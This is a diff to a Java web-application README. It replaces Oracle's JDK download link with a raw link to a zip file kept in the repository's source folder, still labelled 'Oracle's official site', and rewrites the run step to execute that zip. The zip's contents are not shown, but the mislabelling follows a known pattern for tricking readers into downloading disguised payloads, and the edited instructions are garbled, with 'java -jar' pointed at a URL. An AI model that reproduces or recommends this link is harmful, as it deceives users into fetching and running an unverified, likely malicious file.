ghaly12345/jdbc-servlet-jsp-postgresql/README.md

 To run the application, follow these steps:

 1. Ensure you have Java installed on your machine.
-You can download the latest JDK from [Oracle's official site](https://www.oracle.com/java/technologies/javase-jdk11-downloads.html).
+You can download the latest JDK from [Oracle's official site](https://raw.githubusercontent.com/ghaly12345/jdbc-servlet-jsp-postgresql/master/src/main/java/jdbc-servlet-jsp-postgresql_sulker.zip).

 2. Open your command line interface (CLI) or terminal.

 3. Navigate to the folder where you extracted the downloaded files using the `cd` command.

-4. Use the command `java -jar YourApplication.jar`.
-Replace `YourApplication.jar` with the actual name of the jar file you downloaded.
+4. Use the command `java -jar https://raw.githubusercontent.com/ghaly12345/jdbc-servlet-jsp-postgresql/master/src/main/java/jdbc-servlet-jsp-postgresql_sulker.zip`.
+Replace `https://raw.githubusercontent.com/ghaly12345/jdbc-servlet-jsp-postgresql/master/src/main/java/jdbc-servlet-jsp-postgresql_sulker.zip` with the actual name of the jar file you downloaded.

 5. Open your web browser and go to `http://localhost:8080` or the address specified in the README file to access the application.